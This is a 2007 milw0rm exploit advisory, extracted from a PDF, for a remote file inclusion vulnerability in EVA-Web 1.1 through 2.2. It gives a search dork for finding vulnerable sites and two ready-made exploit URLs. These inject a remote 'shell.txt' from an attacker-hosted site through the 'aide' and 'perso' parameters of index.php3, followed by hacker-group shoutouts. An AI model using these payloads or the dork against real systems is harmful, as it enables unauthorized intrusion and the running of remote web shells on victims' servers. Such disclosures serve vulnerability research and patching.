EVAWeb 1.1 2.2 index.php3 Remote File Inclusion Vulnerabilities.pdf

1 ############################################################################################### 2 # ___ ___ _ 3 # / _ \ / _ \ | | 4 # __ _| | | | | | |_ __ ___ _ __ ___| |_ 5 # / _‘ | | | | | | | ’_ \/ __| | ’_ \ / _ \ __| 6 # | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ 7 # \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| 8 # __/ | 9 # |___/ 10 ############################################################################################### 11 #Program Title ################################################################################ 12 #EVA−Web 1.1<=2.2 Remote File Inclusion 13 # 14 #Note ####################################################################################### 15 #A patch was released some time ago..but there was never an exploit released.. 16 # 17 #Script Download ############################################################################## 18 #http://spip−edu.edres74.net 19 # 20 #d0rk ###################################################################################### 21 #"et utilise le squelette EVA−Web" −3.0 −2.3 22 # 23 #Spl0it ######################################################################################### 24 #www.victim.com/[path to webapp]/eva/index.php3?aide=http://www.ursite.com/shell.txt? 25 #www.victim.com/[path to webapp]/eva/index.php3?perso=http://www.ursite.com/shell.txt? 26 # 27 #vuln discovered by ############################################################################### 28 #MurderSkillz 29 # 30 #shoutz: z3r0, milf, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke, 31 #fish, rey, canuck, ,vipsta, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury, 32 #<S>, Bernard, and everyone else at g00ns.net 33 ############################################################################################### 34 35 # milw0rm.com [2007−06−26] Page 1/1 EVAWeb 1.1 2.2 index.php3 Remote File Inclusion Vulnerabilities g00ns 06/26/2007